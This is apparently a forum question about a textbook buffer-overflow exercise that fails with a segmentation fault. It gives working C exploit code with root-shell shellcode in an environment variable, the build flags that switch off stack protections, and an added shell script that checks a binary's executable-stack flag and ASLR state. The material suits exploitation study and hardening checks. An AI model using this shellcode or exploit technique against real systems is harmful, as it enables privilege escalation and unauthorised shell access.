I'm trying this code inspired by the "Hacking: The Art of Exploitation" book. It involves exploiting a buffer overflow using the environment variable. The exploitation code is:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51"
                       "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd"
                       "\x80";

    int main(int argc, char *argv[]) {
        char *env[2] = {shellcode, 0};
        unsigned int i, ret;
        char *buffer = (char *)malloc(160);

        ret = 0xbffffffa - sizeof(shellcode) - strlen("./auth_overflow");
        for (i = 0; i < 160; i += 4)
            *((unsigned int *)(buffer + i)) = ret;

        execle("./auth_overflow", "auth_overflow", buffer, (char *)NULL, env);
        free(buffer);
    }
The problem is the base address 0xbffffffa. I read here that the reason for this address is because "the Linux kernel is implemented like so". Still, the exploit is not working and results in a segmentation fault.
I'm running Ubuntu 14.04 with kernel version 3.13.0-83-generic on a 64-bit machine, and I'm compiling the exploitation code using the following command:
gcc -m32 -fno-stack-protector -z execstack -g exploit.c -o exploit
I also disabled ASLR.
Any ideas on how to determine this base address?
Thanks for the help.
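The post depends on two mitigations being switched off: ASLR (system-wide) and the non-executable stack (per binary, via -z execstack). The script below is an added example, not part of the question or the book's code; it reports the state of both so you can confirm a test binary actually has the protections you think it has. It assumes readelf from binutils is installed, and the flag parsing follows the layout of readelf -lW program-header output.

```shell
#!/bin/sh
# Added example: report the two protections that the question's build disables.

# stack_flags TEXT: TEXT is the output of `readelf -lW <binary>`.
# Prints "exec" if the GNU_STACK program header carries the E flag (what
# `-z execstack` produces), "noexec" if it does not, and "missing" if the
# binary has no GNU_STACK header at all (the loader then applies its own
# default, which on older x86 systems was an executable stack).
stack_flags() {
    printf '%s\n' "$1" | awk '
        $1 == "GNU_STACK" {
            found = 1
            # flags are the second-to-last column, e.g. "RW" or "RWE"
            if ($(NF-1) ~ /E/) print "exec"; else print "noexec"
        }
        END { if (!found) print "missing" }'
}

# aslr_state VALUE: VALUE is the content of /proc/sys/kernel/randomize_va_space.
aslr_state() {
    case "$1" in
        0) echo off ;;           # no randomization: fixed stack top, as assumed by the exploit
        1) echo conservative ;;  # stack, mmap and VDSO randomized, brk area not
        2) echo full ;;          # everything above plus the brk area (the modern default)
        *) echo unknown ;;
    esac
}

# Usage: ./check.sh ./auth_overflow
if [ -n "${1:-}" ]; then
    echo "stack: $(stack_flags "$(readelf -lW "$1")")"
    if [ -r /proc/sys/kernel/randomize_va_space ]; then
        echo "aslr:  $(aslr_state "$(cat /proc/sys/kernel/randomize_va_space)")"
    fi
fi
```

A binary that reports "noexec" together with "full" ASLR is the hardened configuration; "exec" plus "off" is the lab setup the question describes.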